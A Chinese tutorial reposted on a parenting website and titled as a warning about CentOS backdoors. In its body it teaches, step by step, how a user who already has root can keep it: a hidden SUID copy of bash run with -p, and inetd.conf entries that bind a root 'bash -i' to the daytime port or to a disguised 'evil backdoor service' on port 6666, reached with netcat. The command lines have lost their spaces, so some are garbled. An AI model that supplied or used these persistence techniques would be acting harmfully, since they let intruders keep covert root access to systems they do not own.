请选择时期:
怀孕准备 怀孕 分娩 宝宝0-1岁 宝宝1-3岁 宝宝3-6岁

CentOS小心被suid centos用户被锁

来源: 最后更新:23-09-05 12:18:13

导读:CentOS小心被suid shell与inetd后门利用的详细讲解 CentOS小心被suid shell与inetd后门利用的详细讲解 你现在已经是root

  CentOS小心被suid shell与inetd后门利用的详细讲解

你现在已经是root用户,想留一个后门。 CentOS小心被suid shell与inetd后门利用的详细讲解

  系统环境:

  dawg:~#uname-a

  Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

  1.SUIDshell

  首先,先切换成为root用户,并执行以下的命令:

  dawg:~#cp/bin/bash/.wootdawg:~#chmod4755/.wootdawg:~#ls-al/.woot-rwsr-xr-x1rootroot690668Jul2417:14/.woot

  当然,你也可以起其他更具备隐藏性的名字,我想猥琐并机智的你,肯定能想出很多好的名字的。文件前面的那一点也不是必要的,只是为了隐藏文件(在文件名的最前面加上“.”,就可以在任意文件目录下进行隐藏).

  现在,做为一个普通用户,我们来启用这个后门:

  fw@dawg:~$iduid=1000(fw)gid=1000(fw)groups=1000(fw)fw@dawg:~$/.woot.woot-2.05b$iduid=1000(fw)gid=1000(fw)groups=1000(fw).woot-2.05b$

  为什么不行呢?

  因为bash2针对suid有一些护卫的措施.但这也不是不可破的:

  .woot-2.05b$/.woot-p

  .woot-2.05b#id

  uid=1000(fw)gid=1000(fw)euid=0(root)groups=1000(fw)

  使用-p参数来获取一个rootshell.这个euid的意思是effectiveuserid(关于这些ID的知识,可以戳这里)

  这里要特别注意的是,作为一个普通用户执行这个SUIDshell时,一定要使用全路径。

  小知识:

  如何查找那些具有SUID的文件:

  dawg:~#find/-perm+4000-ls

  这时就会返回具有SUID位的文件啦。

  2.远程后门:利用/etc/inetd.conf

  我们使用vi来修改/etc/inetd.conf文件

  原文件:

  #chargendgramudpwaitrootinternal

  #discardstreamtcpnowaitrootinternal

  #discarddgramudpwaitrootinternal

  #daytimestreamtcpnowaitrootinternal

  修改为:

  #discardstreamtcpnowaitrootinternal

  #discarddgramudpwaitrootinternal

  daytimestreamtcpnowaitroot/bin/bashbash-i

  开启inetd:

  dawg:~#inetd

  如果要强制重启inetd:

  dawg:~#ps-ef|grepinetdroot36210Jul22?00:00:00/usr/sbin/inetdroot1376913643017:51pts/100:00:00grepinetddawg:~#kill-HUP362

  现在我们就可以用nc来爆菊了:

  C:tools192.168.1.77:inversehostlookupfailed:h_errno11004:NO_DATA

  (UNKNOWN)[192.168.1.77]13(daytime)open

  bash:nojobcontrolinthisshell

  bash-2.05b#bash-2.05b#

  bash-2.05b#iduid=0(root)

  gid=0(root)groups=0(root)bash-2.05b#uname-a

  Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

  小贴士:

  我们可以修改/etc/services文件,加入以下的东西:

  woot6666/tcp#evilbackdoorservice

  然后修改/etc/inetd.conf:

  wootstreamtcpnowaitroot/bin/bashbash-i

  我们可以修改成一些常见的端口,以实现隐藏。

标签: 后门  文件  我们可以  

免责声明:本文系转载,版权归原作者所有;旨在传递信息,其原创性以及文中陈述文字和内容未经本站证实。

本文地址:http://www.zuomama.com/qiaomen/youxi/1119407.html

  • 1鼎捷软件待遇 鼎捷软件待遇怎么样

    鼎捷软件待遇 鼎捷软件待遇怎么样

  • 2潍柴公司一般招什么人(2021年潍柴招聘吗)

    潍柴公司一般招什么人(2021年潍柴招聘吗)

  • 3马鲁申头盔怎么看是不是正品 马鲁申头盔和ls2头盔谁的质量更好一些

    马鲁申头盔怎么看是不是正品 马鲁申头盔和ls2头盔谁的质量更好一些

  • 4本田歌诗图缺点有哪些(本田歌诗图的优缺点)

    本田歌诗图缺点有哪些(本田歌诗图的优缺点)

  • 5浙江师范大学认可度(浙江师范大学牛吗)

    浙江师范大学认可度(浙江师范大学牛吗)

  • 6为什么想去杜嘉班纳的品牌 为什么想去杜嘉班纳的品牌工作

    为什么想去杜嘉班纳的品牌 为什么想去杜嘉班纳的品牌工作

  • 7山东经贸职业学院会计系宿舍(山东经贸职业学院会计系宿舍怎么样)

    山东经贸职业学院会计系宿舍(山东经贸职业学院会计系宿舍怎么样)

  • 8矿大电气研究生就业(矿大电气研究生就业方向)

    矿大电气研究生就业(矿大电气研究生就业方向)

  • 9苹果gt740m 苹果GT750m显卡过时嘛

    苹果gt740m 苹果GT750m显卡过时嘛

  • 10旅顺日俄监狱旧址博物馆2023年志愿者招募

    旅顺日俄监狱旧址博物馆2023年志愿者招募

关于我们 | 广告服务 | 网站合作 | 免责声明 | 联系我们| 网站地图

© 2006-2022 做妈妈育儿网 all rights reserved. 浙ICP备2022035435号-3

声明: 本站文章均来自互联网,不代表本站观点 如有异议 请与本站联系 联系邮箱:kf#zuomama.com (请把#替换成@)